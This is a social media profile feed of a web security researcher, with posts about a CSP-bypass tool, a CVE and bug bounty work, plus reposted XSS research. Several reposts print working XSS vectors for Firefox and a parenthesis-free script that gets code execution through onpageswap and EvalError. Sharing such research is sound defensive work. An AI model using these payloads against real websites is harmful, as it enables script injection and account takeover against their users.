renniepak
@renniepak.nl
2.1K followers 210 following 160 posts
Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. Creator of CSPBypass.com. (he/him)
Posts Media Videos Starter Packs
Reposted by renniepak
In a shameless effort to promote my book. I've crafted some very special vectors for you. If you like them please purchase my book to read more.

www.amazon.com/dp/B0BRD9B3GS
https://www.amazon.com/dp/B0BRD9B3GS
I was unaware of coding music to begin with. So I guess I'll check out sonicpi as well. :)
Reposted by renniepak
Great interview with @racheltobac.bsky.social shining a light in a lot of important topics, like what are likely attack vectors, impact of #AI on #security, #ethics, affecting social interactions and #privacy .

"Be politely paranoid." 👏

www.youtube.com/watch?v=xEdZ...
Social Engineer: YOU are Easier to Hack than your Computer
YouTube video by Scammer Payback
www.youtube.com
Coded some PHP today without using ChatGPT, like a mad man.
Reposted by renniepak
0xacb @0xacb.com · Aug 26
Time to reveal what I was doing with @teknogeek.io back in '19.

All the hard work and sleepless nights have paid off!
Just finished a major UI overhaul of CSPBypass.com and would love your feedback. Excited to welcome ProjectDiscovery as our first sponsor. Huge thanks to their team for supporting the project and recognizing its value to the community.
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
CSPBypass.com
I enabled sponsorships on Github for cspbypass.com.

The main goal is to cover hosting fees etc. So if you want to support my work, I would highly appreciate it if you could become a sponsor.

github.com/sponsors/ren...

Thanks!
CSP Bypass Search
A tool designed to help ethical hackers bypass restrictive Content Security Policies
cspbypass.com
Forgot how to bug bounty.
LOL. almost 3 years after reporting it and it being fixed, I got assigned a CVE for a vuln I found 🙃

nvd.nist.gov/vuln/detail/...
NVD - CVE-2025-53836
nvd.nist.gov
That's awesome! Congrats!
Reposted by renniepak
Made hacking rooms work in real time. This demo connects three browsers with real time editing on. From Chrome I edit some HTML. This gets sent over websockets to the other browsers which call postMessage to a blob with a sandboxed iframe.
I have no clue any more. I have stored XSS on a specific subdomain, I have another subdomain that reflects all cookies (also http only), I can register my own OAuth clients somewhere else. But uh, I dunno. Stuff.
I feel like I have all the pieces to a ATO chain. I just have no idea what the chain would be...
I thought he would. That dude is awesome.
I think @mrtuxracer.bsky.social already does this kind of stuff as part of his bug bounty. Not cloud though.
No, the conference took place quite a while ago. This is my website, and the slides will remain available here.
Reposted by renniepak
Epic Firefox XSS vectors by Masato Kinugawa. Now available on our XSS cheat sheet including variants found by me.

Link to vectors👇
portswigger.net/web-security...
<object data=# codebase=javascript:alert(document.domain)//>
<embed src=# codebase=javascript:alert(document.domain)//>
<object data="#
alert(1)" codebase=javascript://>
<embed src="#!
alert(1)" codebase=javascript:>
🏳️‍🌈
What are the benefits?
You can checkout all the slides/examples here:
0-a.nl/nahamcon/

I don't have a blog (about WAF bypasses).
Widgets Gone Wild - Title Slide
0-a.nl
K-9 = Canine.

🤯
Reposted by renniepak
Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens.
@0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet.

Link to vector👇
portswigger.net/web-security...
<script>
onpageswap=setTimeout;
location='x';
Event.prototype.toString=EvalError.prototype.toString;
Event.prototype.name='alert\x281\x29'
</script>